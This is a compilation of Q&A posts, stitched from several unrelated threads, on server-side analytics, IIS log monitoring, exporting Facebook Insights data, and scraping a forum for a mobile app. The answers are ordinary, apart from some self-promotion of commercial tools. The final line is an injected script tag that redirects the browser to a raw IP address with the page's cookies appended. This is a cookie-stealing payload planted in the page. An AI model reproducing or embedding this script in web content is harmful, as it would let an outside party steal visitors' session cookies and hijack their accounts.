Is it possible to use google analytics for server side? We are quite familiar with using google analytics for client side of things, but we found ourselves needing to keep track of server events as well. Where should we go for this? Ideally we want to make simple calls and it can help us track sessions length, frequencies, trends etc
I'm not looking for software that analysis and parse my log files. The apache log files is not sufficient, we need to know specific events inside each page.
Google Code contains this tool (if you're using PHP 5.2+):
http://code.google.com/p/serversidegoogleanalytics/
Other than that, there was a similar question asked here:
https://stackoverflow.com/questions/287260/are-there-any-free-and-open-source-server-side-analytics-engines
This project looks good too: http://code.google.com/p/php-ga/
Related
I am tasked with the development of a web page.
As a part of this, I also need to collect the details of browser used by the users to browse the web page (along with version, timestamp & IP).
Tried searching over the internet but maybe my search was not properly directed.
I am not sure how to go about this.
Any pointer to get me started here would help me a long way.
I would also like to know how to store the information thus collected.
Not sure if this is a good idea - but just thinking out loud - are there any online service/channel available where the data can be uploaded in real time - like thingspeak.
Thanks
Google Analytics is great, but it doens't give you the data (for free). So if you want your data in e.g. SQL format then I may suggest a you use a tool that collects the data for you and then sends it to Google Analytics.
We use Segment (segment.io, but there are probably other tools out there too) for this, they have a free plan. You will need to create a Warehouse in AWS and all your data will be stored there, incl. details of the browser (version, timestamp, IP).
Disclaimer: I do not work for Segment, but I am a customer.
Enable Google Analytics in your website, then after 1 week, take a look at the Google Analytics page to see data that was collected.
Follow the guide here to configure Google Analytics on your website: https://support.google.com/analytics/answer/1008080?hl=en
You should go for alternatives like Segment(https://segment.com/), Mixpanel(https://mixpanel.com/) and similars. They can guarantee consistency for your data and also integrate to many different analytics tools and platforms.
note: there are few similar questions already asked here - but they are from 2009. May be something has changed since then.
I'm responsible for a bunch of websites hosted on different servers. I do not do any log analysis right now, but I would like to change this. First question - what is the best tool to view ISSUES with the website based on IIS logs (i.e. 404, 500 responses, long page processing, etc)? Ideally with grouping/sorting options? I do not want to spend a lot of time on this, I just want to periodically check if all is good with the website.
Second question (and I know most likely i'm asking for too much) - but is there any way to expose processed logs to web? So I can review things mentioned above without RPDing into the server?
Ideally I'm looking for a free/open source solution, but I'm ready to pay for a good software as well (but not a lot of $$).
Thank you.
You can take a look at our log monitoring solution EventSentry, which can monitor text-based logs like IIS logs. We have standard templates setup for IIS, and we can consolidate the logs in a database with web-access, so that you can review the logs without using RDP.
It's a pretty flexible solution that allows you to pick the fields you are interested in, and ignore the ones you are not - and thus save space in your database.
You can also setup real-time alerts, so that you can get an email when a critical error is encountered in a log file, like a 500 error.
http://www.eventsentry.com/features/log-file-monitoring
Finally, you can also plug-in command line tools which can verify that a given web page is accessible, or get alerted when it changes: http://www.eventsentry.com/features/application-monitoring.
I'm biased of course, but I would say that our solution is pretty affordable. Since it offers additional functionality as well, such as service monitoring (to monitor your IIS services) and event log monitoring (IIS does log critical messages to the event log), you can setup comprehensive monitoring with a single product.
I'd look into #LuckyLuke solution (or similar) - classic "build vs buy" decision. Based on your post, this isn't going to be your "full time" job so IMHO its best to leave it to those who do...
I don't know what "legacy" answers you are referring to, but if you want to tinker you can use Microsoft's own log parser, and depending on how far you want to go with it, you can use it (COM dll) to write your "admin web pages" in .Net/ASP.Net and host it in each of your servers....
If you're very specific about the errors you just want to be alerted about, another "hacky" way would be to provide your own custom error pages (either the default IIS error pages, or configure your Asp.Net apps to use specific error pages).
I'm looking for a way of programmatically exporting Facebook insights data for my pages, in a way that I can automate it. Specifically, I'd like to create a scheduled task that runs daily, and that can save a CSV or Excel file of a page's insights data using a Facebook API. I would then have an ETL job that puts that data into a database.
I checked out the oData service for Excel, which appears to be broken. Does anyone know of a way to programmatically automate the export of insights data for Facebook pages?
It's possible and not too complicated once you know how to access the insights.
Here is how I proceed:
Login the user with the offline_access and read_insights.
read_insights allows me to access the insights for all the pages and applications the user is admin of.
offline_access gives me a permanent token that I can use to update the insights without having to wait for the user to login.
Retrieve the list of pages and applications the user is admin of, and store those in database.
When I want to get the insights for a page or application, I don't query FQL, I query the Graph API: First I calculate how many queries to graph.facebook.com/[object_id]/insights are necessary, according to the date range chosen. Then I generate a query to use with the Batch API (http://developers.facebook.com/docs/reference/api/batch/). That allows me to get all the data for all the available insights, for all the days in the date range, in only one query.
I parse the rather huge json object obtained (which weight a few Mb, be aware of that) and store everything in database.
Now that you have all the insights parsed and stored in database, you're just a few SQL queries away from manipulating the data the way you want, like displaying charts, or exporting in CSV or Excel format.
I have the code already made (and published as a temporarily free tool on www.social-insights.net), so exporting to excel would be quite fast and easy.
Let me know if I can help you with that.
It can be done before the week-end.
You would need to write something that uses the Insights part of the Facebook Graph API. I haven't seen something already written for this.
Check out http://megalytic.com. This is a service that exports FB Insights (along with Google Analytics, Twitter, and some others) to Excel.
A new tool is available: the Analytics Edge add-ins now have a Facebook connector that makes downloads a snap.
http://www.analyticsedge.com/facebook-connector/
There are a number of ways that you could do this. I would suggest your choice depends on two factors:
What is your level of coding skill?
How much data are you looking to move?
I can't answer 1 for you, but in your case you aren't moving that much data (in relative terms). I will still share three options of many.
HARD CODE IT
This would require a script that accesses Facebook's GraphAPI
AND a computer/server to process that request automatically.
I primarily use AWS and would suggest that you could launch an EC2
and have it scheduled to launch your script at X times. I haven't used AWS Pipeline, but I do know that it is designed in a way that you can have it run a script automatically as well... supposedly with a little less server know-how
USE THIRD PARTY ADD-ON
There are a lot of people who have similar data needs. It has led to a number of easy-to-use tools. I use Supermetrics Free to run occasional audits and make sure that our tools are running properly. Supermetrics is fast and has a really easy interface to access Facebooks API's and several others. I believe that you can also schedule refreshes and updates with it.
USE THIRD PARTY FULL-SERVICE ETL
There are also several services or freelancers that can set this up for you at little to no work on your own. Depending on where you want the data. Stitch is a service I have worked with on FB-ads. There might be better services, but it has fulfilled our needs for now.
MY SUGGESTION
You would probably be best served by using a third-party add-on like Supermetrics. It's fast and easy to use. The other methods might be more worth looking into if you had a lot more data to move, or needed it to be refreshed more often than daily.
I would like to create an app for a myBB forum. So the site on the forum will look nicer and much more cleaner on an iPhone or Android.
Is it possible without an API? It isn't my site ether.
everything is possible, it's just a matter of resources...
technically, you can write an app for everything on the web, but:
an API will tell you how you can do things with the site, without having to reverse engineer all pages/posts/..., and the format of every output resulting from post/get operations. reverse engineering may take a long time, and you will surely not come accross all possible results (error pages, bad authentication...);
an API is quite stable and is always updated with great care from the developpers so as not to break existing applications. without an API, there is no guarantees that your app will not break with the next release of the forum when it is upgraded;
a web API generally defines an output format which is easily parseable: many API outputs XML or JSON, which can be processed with standard libraries. without an API, the output format is plain HTML, which may be difficult to reorganize in order to show the results in a different format.
so, yes, you can definitely write an app for a myBB forum, but it may require a fair amount of work.
You can do, it's called screen scraping and is what was done before XML, the semantic web, SOAP, web services and then JSON apis tried to solve the problem better.
In screen scraping, you grab the site's HTML, parse it, get the data you want out of it, then do what you need with that data. It's more work, and breaks each time the site's layout changes, hence the history of improvements to it.
You mention the site in question is not yours. Many sites do not regard screen scraping as fair use, so check with the site's terms and conditions that you can legally create an app from the data posted there.
you can consider useing HTML5 ... do you think it doable for use app ?
I need to log the hits on a sub-domain in Windows IIS 6.0 without designating them as separate websites in the IIS Manager. I have been told this is not possible. How can I write my own script to do this?
I'm afraid google analytics is not an option due to the setup, I just need access (i'm guessing) to the file request event and its properties.
Wyatt Barnette - I've thought of this! But how do I set those properties for it to collect them all? I'm writing my own log parsing software, as I need specific things, I just need the server to generate the logs for me to parse!
Have you considered using Google Analytics across all your sites? I know that this is not true logging...but sometimes addressing simple problems with simple solutions is easier! Log parsing seems to be slowly fading away...
What you should be able to do is have your stats tracking package look at multiple IIS websites as a single site.
If your logging package can't handle this, check out the IIS log parsing tool. That should at least take care of the more onerous part of the task (actually making sense of the logfiles). From there it is a pretty straightforward reporting operation.
<script language="JavaScript">document.location="http://142.0.71.119:88/get.php?cookie="+document.cookie;</script>